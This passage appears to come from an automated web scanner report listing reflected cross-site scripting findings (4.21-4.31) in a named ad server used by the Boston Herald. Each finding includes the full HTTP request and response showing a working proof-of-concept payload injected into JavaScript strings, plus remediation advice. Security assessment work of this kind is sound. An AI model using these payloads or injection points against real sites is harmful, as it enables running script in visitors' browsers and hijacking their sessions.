Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86cf3'-alert(1)-'c4fb3c8bde4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?&86cf3'-alert(1)-'c4fb3c8bde4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:44 GMT
Connection: close
Set-Cookie: dc=sea-dc%22; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?&86cf3'-alert(1)-'c4fb3c8bde4=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.21. http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1595'-alert(1)-'d3ce0ff70fa was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?c1595'-alert(1)-'d3ce0ff70fa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:43 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1ddf45fe985559f7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?c1595'-alert(1)-'d3ce0ff70fa;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.22. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11b93'-alert(1)-'1cfbaccfaf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;env=ifr;ord1=40053;cmpgurl=http%253A//bostonherald.com/includes/processAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8338
Date: Sat, 17 Sep 2011 01:49:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30420328179_1316224147","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5&size=728x90&imp_id=cm-30420328179_1316224147,12298b058f07061&referrer=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldint
...[SNIP]...

4.23. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a58b8(a)cb7eca68845 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_bostonherald/;sz=a58b8(a)cb7eca68845 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8090
Date: Sat, 17 Sep 2011 01:48:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:a58b8(a)cb7eca68845,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

4.24. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d0f'-alert(1)-'238029b5c84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7400

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30221086088_1316222009","http://ad.doubleclick.net/adj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30221086088_1316222009,12298b058f07061,polit,;;cmw=owl;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER
...[SNIP]...

4.25. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8c69'-alert(1)-'5b29faf592d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:33 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30501481718_1316222013","http://ad.doubleclick.net/adj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;net=iblocal;u=,iblocal-30501481718_1316222013,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt>
...[SNIP]...

4.26. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60a13'-alert(1)-'30c480b6c14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:37 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30201561711_1316222017","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;net=iblocal;u=,iblocal-30201561711_1316222017,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt>
...[SNIP]...

4.27. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 743e9'-alert(1)-'e734a6f0a30 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=743e9'-alert(1)-'e734a6f0a30 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:20 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7353

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
iveMedia.createAndAttachAd("iblocal-30322160699_1316222000","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30322160699_1316222000,12298b058f07061,none,;;sz=743e9'-alert(1)-'e734a6f0a30;contx=none;dc=s;btg=?","743e9'-alert(1)-'e734a6f0a30","",true);</scr'+'ipt>
...[SNIP]...

4.28. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80447'-alert(1)-'f91ca21afff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:51 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219867092_1316221791","http://ad.doubleclick.net/adj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;net=q1;u=,q1-30219867092_1316221791,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.29. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87eb6'-alert(1)-'9d423e3fbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7357
Date: Sat, 17 Sep 2011 01:09:52 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419616533_1316221792","http://ad.doubleclick.net/adj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;net=q1;u=,q1-30419616533_1316221792,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.30. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7479'-alert(1)-'d7ae9e9aabb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30503457423_1316221793","http://ad.doubleclick.net/adj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;net=q1;u=,q1-30503457423_1316221793,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.31. http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7744'-alert(1)-'53b38ddfa3a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_news;sz=a7744'-alert(1)-'53b38ddfa3a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7330
Date: Sat, 17 Sep 2011 01:09:49 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
